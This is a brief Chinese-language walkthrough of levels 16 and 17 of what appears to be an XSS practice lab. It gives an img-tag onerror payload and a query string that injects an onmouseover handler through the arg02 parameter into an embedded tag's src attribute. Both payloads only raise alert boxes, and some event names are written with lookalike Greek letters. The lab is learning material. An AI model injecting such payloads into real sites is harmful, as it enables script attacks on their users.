十六.
1.进入关卡按f12
2.把下面语句插入里面
<img src=1 οnerrοr=alert('xss')>
十七.
1.查看一下网络源码
2.传入的两个参数arg01
和arg02
,出现在了嵌入的src
属性中,那我们再arg02
处给这个嵌入的标签注册一个事件弹窗即可。
?arg01=a&arg02=%27%20οnmοuseοver=alert("aini")